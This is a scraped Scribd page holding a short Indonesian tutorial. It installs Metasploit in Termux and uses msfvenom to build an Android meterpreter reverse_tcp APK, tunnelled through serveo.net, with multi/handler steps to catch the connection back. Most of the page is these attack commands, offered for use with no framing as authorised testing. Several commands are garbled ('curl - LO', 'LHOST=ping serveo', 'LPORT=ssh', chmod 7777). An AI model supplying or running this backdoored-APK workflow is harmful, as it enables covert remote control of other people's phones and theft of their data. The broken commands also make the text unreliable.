0% found this document useful (0 votes)
228 views1 page

Metasploit Tools

This document provides instructions for installing Metasploit on Termux and generating an Android APK payload to establish a reverse TCP connection back to the device. It describes downloading required packages and tools using apt and pkg, curling a script to install Metasploit, navigating to the Metasploit directory and running msfconsole. It also provides commands to use the multi/handler exploit, set the payload and listener, and generate an APK payload file to install on an Android device that will connect back.

Uploaded by

Muhammad Restu
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
228 views1 page

Metasploit Tools

This document provides instructions for installing Metasploit on Termux and generating an Android APK payload to establish a reverse TCP connection back to the device. It describes downloading required packages and tools using apt and pkg, curling a script to install Metasploit, navigating to the Metasploit directory and running msfconsole. It also provides commands to use the multi/handler exploit, set the payload and listener, and generate an APK payload file to install on an Android device that will connect back.

Uploaded by

Muhammad Restu
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 1

$apt install python

$apt install python2


$apt install git
$apt install wget
$apt install ruby
$pkg install openssh
$pkg install curl
$curl - LO
https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh

Setelah curl -LO langsung spasi dan di lanjutkan dengan link diatas lalu tekan
enter setelah menulis curl -LO
kemudian ketik :

$ls

Jika metasploit.sh sudah tampil. Maka lanjutkan ketik :


$chmod 7777 metasploit.sh

Kemudian ketik :
$./metasploit.sh

Tunggu proses installnya selesai. Kurang lebih 10 - 20 menit. Tergantung koneksi


internet juga,
Jika selesai akan ada keterangan

######################################
NOW YOU CAN LAUNCH METASPLOIT BY JUST EXECUTE THE COMMAND :=>
msfconcole
######################################

Selanjutnya..
Buka jendela baru pada Termuxnya.
Ketik :
$cd metasploit-framework
kemudian ketik:
$./msfconsole

tunggu lagi beberapa menit sampai msfnya terbuka.

ssh -R 1202:localhost:1202 serveo.net

msfvenom -p android/meterpreter/reverse_tcp LHOST=ping serveo LPORT=ssh R>


/sdcard/file.apk

TAB BARU
1. ./msfconsole

2. use exploit/multi/handler

3. set payload android/meterpreter/reverse_tcp

4. set LHOST 127.0.0.1

5. set LPORT ssh

6. run

You might also like